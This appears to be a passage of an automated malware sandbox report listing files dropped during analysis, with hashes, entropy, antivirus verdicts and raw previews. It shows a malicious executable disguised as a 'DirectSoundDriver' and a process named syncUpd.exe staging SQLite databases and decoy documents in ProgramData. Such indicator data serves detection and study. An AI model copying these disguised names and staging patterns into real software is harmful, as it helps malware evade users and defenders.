                                                                                                                                                                                                                                SSDEEP:24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
                                                                                                                                                                                                                                MD5:C9386BC43BF8FA274422EB8AC6BAE1A9
                                                                                                                                                                                                                                SHA1:2CBDE59ADA19F0389A4C482667EC370D68F51049
                                                                                                                                                                                                                                SHA-256:F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
                                                                                                                                                                                                                                SHA-512:7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

                                                                                                                                                                                                                                C:\ProgramData\DirectSoundDriver 2.36.198.67\DirectSoundDriver 2.36.198.67.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2075202
                                                                                                                                                                                                                                Entropy (8bit):7.195175286859034
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:tQrflO1c7ZHq97qoPkIb/xBxlKemLLZOyt07l97T6/K5Pu:tQNMclHq9WSrxBxlKemXC7D7GYu
                                                                                                                                                                                                                                MD5:B0E9D3290621648878CA0D486C60F951
                                                                                                                                                                                                                                SHA1:7979A79D81472ACF1A0C14F54AE4E39F94DFB619
                                                                                                                                                                                                                                SHA-256:BCA8B1774E21704B6DF8771D09C76CD3E18CC704D0BBD30829DA3D230808AF4A
                                                                                                                                                                                                                                SHA-512:C68E5110C0BF159EF10AF8CEF92CD4DC122C9C5183D49973D62DB0D59A8E74FBAFE9342593DBAC52EC2CBBA08B3B0ABDE7131602B0C03D38832601E2EB1CE436
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\DirectSoundDriver 2.36.198.67\DirectSoundDriver 2.36.198.67.exe, Author: Joe Security
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...d.i^..........'................. .............@.....................................................................................h............................................................................................................text............................... ..`.rdata...1.......@..................@..@.data....T... ...0... ..............@....rsrc.... ....... ...P..............@..@.short2..@......B:...p..............`...........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\ProgramData\GDBFCGIIIJDBGCBGIDGI

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\syncUpd.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):49152
                                                                                                                                                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\ProgramData\HIEBAKEH

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\syncUpd.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):114688
                                                                                                                                                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\ProgramData\HIJEGDBG

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\syncUpd.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):106496
                                                                                                                                                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\ProgramData\HTAGVDFUIE.docx

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\syncUpd.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.692693183518806
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                                                                                                                                                                                MD5:78F042E25B7FAF970F75DFAA81955268
                                                                                                                                                                                                                                SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                                                                                                                                                                                SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                                                                                                                                                                                SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

                                                                                                                                                                                                                                C:\ProgramData\IDBGHDGHCGHCAAKFIIECFHCFBF

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\syncUpd.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):98304
                                                                                                                                                                                                                                Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\ProgramData\IDGDAAKFHIEHIECAFBAAEBKFBA

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\syncUpd.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):5242880
                                                                                                                                                                                                                                Entropy (8bit):0.037963276276857943
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                                                                                                                                                                MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                                                                                                                                                                SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                                                                                                                                                                SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                                                                                                                                                                SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\ProgramData\KATAXZVCPS.docx

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\syncUpd.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.699548026888946
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                                                                                                                                                MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                                                                                                                                                SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                                                                                                                                                SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                                                                                                                                                SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

                                                                                                                                                                                                                                C:\ProgramData\KATAXZVCPS.xlsx

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\syncUpd.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.699548026888946
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                                                                                                                                                MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                                                                                                                                                SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                                                                                                                                                SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                                                                                                                                                SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

                                                                                                                                                                                                                                C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1310720
                                                                                                                                                                                                                                Entropy (8bit):1.307364786188888
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvr8:KooCEYhgYEL0In
                                                                                                                                                                                                                                MD5:B54DF40BD44A7AF1B6B94F969F3696E6
                                                                                                                                                                                                                                SHA1:90C69AF1469C77F870AF22F952741805BBD7135B
                                                                                                                                                                                                                                SHA-256:1D358388DEF64FC39CD4A0634DA78CAB2C3AD4848551C1948FB12CE963CCCF0D
                                                                                                                                                                                                                                SHA-512:A88E1BDEE38BDFF570B0B6E7DB174092136E4036EAE9B22C50CEB9DD457E9275EA1F3A715A4946FA9DB0CAA06D600B2555CA43C6B6C62023E672D7098212F02E
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x63cfdb75, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1310720
                                                                                                                                                                                                                                Entropy (8bit):0.4221572027640014
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:pSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:paza/vMUM2Uvz7DO
                                                                                                                                                                                                                                MD5:96342CA2002D24D88EFAD4B93AC91384
                                                                                                                                                                                                                                SHA1:E24CF1424314549E642F1037C103BC6D0E20C884
                                                                                                                                                                                                                                SHA-256:84E2F2B036626B34345123DD75916EDA453835ADB60543958828A2B56785C4D3
                                                                                                                                                                                                                                SHA-512:5B92A502C34A5F854C4828CDB1D3E9D4E1C78841B20F81B24BA75DC1F6A4DE7E69FDBBC1FAC133CC7FFBE9581CC7C8426DCDCCA948C9E3E9BE30CA4E14C22923
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:c..u... .......A.......X\...;...{......................0.!..........{A......|y.h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{....................................z......|y..........................|y..........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                File Type:PGP symmetric key encrypted data - salted & iterated -
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):16384
                                                                                                                                                                                                                                Entropy (8bit):0.07664768309124734
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:hEYebQpnkjn13a/KR/lollcVO/lnlZMxZNQl:Ozb+k53qKsOewk
                                                                                                                                                                                                                                MD5:B97A41EB8A8007C73D78DB193C877B94
                                                                                                                                                                                                                                SHA1:A90DB30FCF22A0DF1B64029C0D34DD7BC3AD9C26
                                                                                                                                                                                                                                SHA-256:7DB8D459541E819B5834F51FDA1B5EF76942C5A98CC5F54CB4C5323B5B6259F2
                                                                                                                                                                                                                                SHA-512:BDD8250645DBCE45D7D7417CA6283036FD044546070EB6137897519F3C2674211122296246A400490A9FC8126ECF330B22CE8A0A382FDA130E5B511C18301F02
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:.W(......................................;...{.......|y......{A..............{A......{A..........{A].........................|y.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\ProgramData\NWTVCDUMOB.xlsx

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\syncUpd.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.696250160603532
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
                                                                                                                                                                                                                                MD5:2B6A90B7D410E3A4E2B32C90D816B4FE
                                                                                                                                                                                                                                SHA1:B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
                                                                                                                                                                                                                                SHA-256:D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
                                                                                                                                                                                                                                SHA-512:03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
